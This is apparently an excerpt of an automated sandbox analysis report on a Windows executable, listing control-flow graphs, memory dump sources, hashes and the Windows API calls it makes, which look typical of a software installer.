                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                                      • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                      • API String ID: 1968650500-3419246398
                                                                                                      • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                      • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                                      • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                      • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1793 423c45-423c61 call 40b24c 1791->1793 1798 423cec-423cf1 1792->1798 1799 423c8d 1792->1799 1819 423c63-423c6b 1793->1819 1820 423c70-423c72 1793->1820 1800 423cf3 1798->1800 1801 423d27-423d2c 1798->1801 1802 423c93-423c96 1799->1802 1803 423d50-423d60 1799->1803 1809 423fb1-423fb9 1800->1809 1810 423cf9-423d01 1800->1810 1804 423d32-423d35 1801->1804 1805 42409a-4240a8 IsIconic 1801->1805 1811 423cc5-423cc8 1802->1811 1812 423c98 1802->1812 1807 423d62-423d67 1803->1807 1808 423d6b-423d73 call 424194 1803->1808 1813 4240d6-4240eb call 424850 1804->1813 1814 423d3b-423d3c 1804->1814 1815 424152-42415a 1805->1815 1824 4240ae-4240b9 GetFocus 1805->1824 1821 423d78-423d80 call 4241dc 1807->1821 1822 423d69-423d8c call 423b84 1807->1822 1808->1815 1809->1815 1816 423fbf-423fca call 4181e0 1809->1816 1825 423f13-423f3a SendMessageA 1810->1825 1826 423d07-423d0c 1810->1826 1817 423da9-423db0 1811->1817 1818 423cce-423ccf 1811->1818 1827 423df6-423e06 call 423b84 1812->1827 1828 423c9e-423ca1 1812->1828 1813->1815 1831 423d42-423d45 1814->1831 1832 4240ed-4240f4 1814->1832 1829 424171-424177 1815->1829 1816->1815 1878 423fd0-423fdf call 4181e0 IsWindowEnabled 1816->1878 1817->1815 1841 423db6-423dbd 1817->1841 1842 423cd5-423cd8 1818->1842 1843 423f3f-423f46 1818->1843 1819->1829 1820->1792 1820->1793 1821->1815 1822->1815 1824->1815 1836 4240bf-4240c8 call 41eff4 1824->1836 1825->1815 1844 423d12-423d13 1826->1844 1845 42404a-424055 1826->1845 1827->1815 1837 423ca7-423caa 1828->1837 1838 423e1e-423e3a PostMessageA call 423b84 1828->1838 1847 424120-424127 1831->1847 1848 423d4b 1831->1848 1858 4240f6-424109 call 4244d4 1832->1858 1859 42410b-42411e call 42452c 1832->1859 1836->1815 1891 4240ce-4240d4 SetFocus 1836->1891 1855 423cb0-423cb3 1837->1855 1856 423ea5-423eac 1837->1856 1838->1815 1841->1815 1861 423dc3-423dc9 1841->1861 1862 423cde-423ce1 1842->1862 1863 423e3f-423e5f call 423b84 1842->1863 1843->1815 1851 423f4c-423f51 call 404e54 1843->1851 1864 424072-42407d 1844->1864 1865 423d19-423d1c 1844->1865 1845->1815 1849 42405b-42406d 1845->1849 1882 42413a-424149 1847->1882 1883 424129-424138 1847->1883 1866 42414b-42414c call 423b84 1848->1866 1849->1815 1851->1815 1873 423cb9-423cba 1855->1873 1874 423dce-423ddc IsIconic 1855->1874 1875 423eae-423ec1 call 423b14 1856->1875 1876 423edf-423ef0 call 423b84 1856->1876 1858->1815 1859->1815 1861->1815 1879 423ce7 1862->1879 1880 423e0b-423e19 call 424178 1862->1880 1906 423e83-423ea0 call 423a84 PostMessageA 1863->1906 1907 423e61-423e7e call 423b14 PostMessageA 1863->1907 1864->1815 1867 424083-424095 1864->1867 1884 423d22 1865->1884 1885 423f56-423f5e 1865->1885 1903 424151 1866->1903 1867->1815 1892 423cc0 1873->1892 1893 423d91-423d99 1873->1893 1899 423dea-423df1 call 423b84 1874->1899 1900 423dde-423de5 call 423bc0 1874->1900 1922 423ed3-423eda call 423b84 1875->1922 1923 423ec3-423ecd call 41ef58 1875->1923 1916 423ef2-423ef8 call 41eea4 1876->1916 1917 423f06-423f0e call 423a84 1876->1917 1878->1815 1924 423fe5-423ff4 call 4181e0 IsWindowVisible 1878->1924 1879->1866 1880->1815 1882->1815 1883->1815 1884->1866 1885->1815 1890 423f64-423f6b 1885->1890 1890->1815 1908 423f71-423f80 call 4181e0 IsWindowEnabled 1890->1908 1891->1815 1892->1866 1893->1815 1909 423d9f-423da4 call 422c4c 1893->1909 1899->1815 1900->1815 1903->1815 1906->1815 1907->1815 1908->1815 1937 423f86-423f9c call 412310 1908->1937 1909->1815 1935 423efd-423f00 1916->1935 1917->1815 1922->1815 1923->1922 1924->1815 1942 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1924->1942 1935->1917 1937->1815 1946 423fa2-423fac 1937->1946 1942->1815 1946->1815
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                      • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                                      • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                      • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2187 4675b4-4675bb 2181->2187 2182->2187 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2187->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2187->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2329 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2329 2321->2329 2347 467bb6-467bd1 2329->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2329->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2431 467f40-467f53 call 4145fc 2428->2431 2432 467f3d 2428->2432 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2431->2429 2432->2431 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2535 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2535 2536 4683d1-4683ee call 44ffdc call 450138 2532->2536 2549 468453 2535->2549 2550 46843b-468442 2535->2550 2536->2535 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2557 46846f-468478 2554->2557 2558 46847a-46847c 2554->2558 2556 468480-46849a 2555->2556 2559 468543-46854a 2556->2559 2560 4684a0-4684a9 2556->2560 2557->2555 2557->2558 2558->2556 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2587 468584-468598 call 403494 2563->2587 2588 468575-468582 call 47c440 2563->2588 2572 4685f0-4685f9 2564->2572 2576 4685ff-468617 call 429fd8 2572->2576 2577 468709-468738 call 42b96c call 44e83c 2572->2577 2589 46868e-468692 2576->2589 2590 468619-46861d 2576->2590 2606 4687e6-4687ea 2577->2606 2607 46873e-468742 2577->2607 2602 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2587->2602 2603 46859a-4685a5 call 403494 2587->2603 2588->2602 2596 468694-46869d 2589->2596 2597 4686e2-4686e6 2589->2597 2598 46861f-468659 call 40b24c call 47c26c 2590->2598 2596->2597 2604 46869f-4686aa 2596->2604 2609 4686fa-468704 call 42a05c 2597->2609 2610 4686e8-4686f8 call 42a05c 2597->2610 2663 46865b-468662 2598->2663 2664 468688-46868c 2598->2664 2602->2572 2603->2602 2604->2597 2614 4686ac-4686b0 2604->2614 2617 4687ec-4687f3 2606->2617 2618 468869-46886d 2606->2618 2616 468744-468756 call 40b24c 2607->2616 2609->2577 2610->2577 2622 4686b2-4686d5 call 40b24c call 406ac4 2614->2622 2641 468788-4687bf call 47c26c call 44cb0c 2616->2641 2642 468758-468786 call 47c26c call 44cbdc 2616->2642 2617->2618 2625 4687f5-4687fc 2617->2625 2626 4688d6-4688df 2618->2626 2627 46886f-468886 call 40b24c 2618->2627 2673 4686d7-4686da 2622->2673 2674 4686dc-4686e0 2622->2674 2625->2618 2636 4687fe-468809 2625->2636 2634 4688e1-4688f9 call 40b24c call 4699fc 2626->2634 2635 4688fe-468913 call 466ee0 call 466c5c 2626->2635 2656 4688c6-4688d4 call 4699fc 2627->2656 2657 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2627->2657 2634->2635 2682 468965-46896f call 414a44 2635->2682 2683 468915-468938 call 42a040 call 40b24c 2635->2683 2636->2635 2644 46880f-468813 2636->2644 2684 4687c4-4687c8 2641->2684 2642->2684 2655 468815-46882b call 40b24c 2644->2655 2679 46885e-468862 2655->2679 2680 46882d-468859 call 42a05c call 4699fc call 46989c 2655->2680 2656->2635 2657->2635 2663->2664 2675 468664-468676 call 406ac4 2663->2675 2664->2589 2664->2598 2673->2597 2674->2597 2674->2622 2675->2664 2701 468678-468682 2675->2701 2679->2655 2694 468864 2679->2694 2680->2635 2696 468974-468993 call 414a44 2682->2696 2715 468943-468952 call 414a44 2683->2715 2716 46893a-468941 2683->2716 2692 4687d3-4687d5 2684->2692 2693 4687ca-4687d1 2684->2693 2700 4687dc-4687e0 2692->2700 2693->2692 2693->2700 2694->2635 2711 468995-4689b8 call 42a040 call 469b5c 2696->2711 2712 4689bd-4689e0 call 47c26c call 403450 2696->2712 2700->2606 2700->2616 2701->2664 2706 468684 2701->2706 2706->2664 2711->2712 2730 4689e2-4689eb 2712->2730 2731 4689fc-468a05 2712->2731 2715->2696 2716->2715 2720 468954-468963 call 414a44 2716->2720 2720->2696 2730->2731 2734 4689ed-4689fa call 47c440 2730->2734 2732 468a07-468a19 call 403684 2731->2732 2733 468a1b-468a2b call 403494 2731->2733 2732->2733 2742 468a2d-468a38 call 403494 2732->2742 2741 468a3d-468a54 call 414b18 2733->2741 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2749 468a5f-468a68 2746->2749 2750 468a6a-468a74 call 42b0e4 2746->2750 2752 468a99-468abe call 403400 * 3 2747->2752 2749->2750 2753 468a79-468a88 call 414a44 2749->2753 2750->2753 2753->2752
                                                                                                      APIs
                                                                                                        • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                                      • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                                        • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                                        • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                        • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                        • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                        • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                        • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                                        • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                        • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                        • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                                        • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                                        • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                                        • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                                      • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0216FC14,02171974,?,?,021719A4,?,?,021719F4,?), ref: 004683FD
                                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                                        • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                                      • String ID: $(Default)$STOPIMAGE$%H
                                                                                                      • API String ID: 3231140908-2624782221
                                                                                                      • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                      • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                                      • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                      • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                                      • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                                      • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID: unins$unins???.*
                                                                                                      • API String ID: 3541575487-1009660736
                                                                                                      • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                      • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                                      • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                      • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 873889042-0
                                                                                                      • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                      • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                                      • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                      • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(000003C5,0046E17A), ref: 0046E0EE
                                                                                                      • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,000003C5,0046E17A), ref: 0046E10A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstanceVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 1462612201-0
                                                                                                      • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                      • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                                      • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                      • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                      • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                                      • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                      • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                      • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                                      • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                      • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2645101109-0
                                                                                                      • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                      • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                                      • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                      • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
